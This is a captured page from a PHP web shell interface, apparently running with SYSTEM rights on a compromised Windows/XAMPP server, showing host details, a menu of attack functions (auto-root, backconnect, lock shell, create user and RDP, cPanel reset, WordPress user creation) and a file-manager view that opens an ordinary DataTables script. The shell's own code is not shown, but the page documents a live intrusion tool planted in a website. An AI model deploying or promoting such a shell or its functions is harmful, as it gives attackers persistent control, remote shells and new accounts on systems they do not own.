Windows NT DGPENSV2LPKMN 10.0 build 14393 (Windows Server 2016) AMD64
Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/7.3.25
: 172.16.0.66 | : 172.16.0.254
Cant Read [ /etc/named.conf ]
7.3.25
SYSTEM
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
[ A ]
[ C ]
[ D ]
C: /
xampp7 /
htdocs /
edgpens /
js /
pages /
[ HOME SHELL ]
Name
Size
Permission
Action
appEmail.js
1.67
KB
-rw-rw-rw-
appMedia.js
1.9
KB
-rw-rw-rw-
appSocial.js
2.97
KB
-rw-rw-rw-
compAnimations.js
724
B
-rw-rw-rw-
compCalendar.js
5.92
KB
-rw-rw-rw-
compCharts.js
9.83
KB
-rw-rw-rw-
compGallery.js
1.9
KB
-rw-rw-rw-
compMaps.js
3.99
KB
-rw-rw-rw-
compNestable.js
1.72
KB
-rw-rw-rw-
compTodo.js
1.87
KB
-rw-rw-rw-
compTree.js
627
B
-rw-rw-rw-
formsComponents.js
517
B
-rw-rw-rw-
formsValidation.js
4.17
KB
-rw-rw-rw-
formsWizard.js
5.7
KB
-rw-rw-rw-
readyDashboard.js
5.39
KB
-rw-rw-rw-
readyLogin.js
2.01
KB
-rw-rw-rw-
readyRegister.js
3.07
KB
-rw-rw-rw-
readyReminder.js
1.52
KB
-rw-rw-rw-
readyTimeline.js
785
B
-rw-rw-rw-
uiIcons.js
964
B
-rw-rw-rw-
uiProgress.js
1.7
KB
-rw-rw-rw-
uiTables.js
3.74
KB
-rw-rw-rw-
uiTables_old.js
3.21
KB
-rw-rw-rw-
uiTypography.js
783
B
-rw-rw-rw-
uiWidgets.js
6.72
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : uiTables.js
/* * Document : uiTables.js * Author : pixelcave * Description: Custom javascript code used in Tables page */ var UiTables = function() { return { init: function() { /* Initialize Bootstrap Datatables Integration */ App.datatables(); /* Initialize Datatables */ $('#example-datatable').dataTable({ columnDefs: [ { orderable: false, targets: [ 4 ] } ], pageLength: 10, lengthMenu: [[5, 10, 20], [5, 10, 20]] }); $('#datatable-dg1').dataTable({ "order": [0,"asc"], //columnDefs: [ { orderable: false, targets: [ 0 ] } ], pageLength: 10, lengthMenu: [[5, 10, 20], [5, 10, 20]] }); $('#datatable-dg2').dataTable({ "order": [1,"asc"], //columnDefs: [ { orderable: false, targets: [ 0 ] } ], pageLength: 10, lengthMenu: [[5, 10, 20], [5, 10, 20]] }); $('#datatable-dg3').dataTable({ "order": [2,"asc"], //columnDefs: [ { orderable: false, targets: [ 0 ] } ], pageLength: 10, lengthMenu: [[5, 10, 20], [5, 10, 20]] }); /* Add placeholder attribute to the search input */ $('.dataTables_filter input').attr('placeholder', 'Search'); /* Select/Deselect all checkboxes in tables */ $('thead input:checkbox').click(function() { var checkedStatus = $(this).prop('checked'); var table = $(this).closest('table'); $('tbody input:checkbox', table).each(function() { $(this).prop('checked', checkedStatus); }); }); /* Table Styles Switcher */ var genTable = $('#general-table'); var styleBorders = $('#style-borders'); $('#style-default').on('click', function(){ styleBorders.find('.btn').removeClass('active'); $(this).addClass('active'); genTable.removeClass('table-bordered').removeClass('table-borderless'); }); $('#style-bordered').on('click', function(){ styleBorders.find('.btn').removeClass('active'); $(this).addClass('active'); genTable.removeClass('table-borderless').addClass('table-bordered'); }); $('#style-borderless').on('click', function(){ styleBorders.find('.btn').removeClass('active'); $(this).addClass('active'); genTable.removeClass('table-bordered').addClass('table-borderless'); }); $('#style-striped').on('click', function() { $(this).toggleClass('active'); if ($(this).hasClass('active')) { genTable.addClass('table-striped'); } else { genTable.removeClass('table-striped'); } }); $('#style-condensed').on('click', function() { $(this).toggleClass('active'); if ($(this).hasClass('active')) { genTable.addClass('table-condensed'); } else { genTable.removeClass('table-condensed'); } }); $('#style-hover').on('click', function() { $(this).toggleClass('active'); if ($(this).hasClass('active')) { genTable.addClass('table-hover'); } else { genTable.removeClass('table-hover'); } }); } }; }();
Close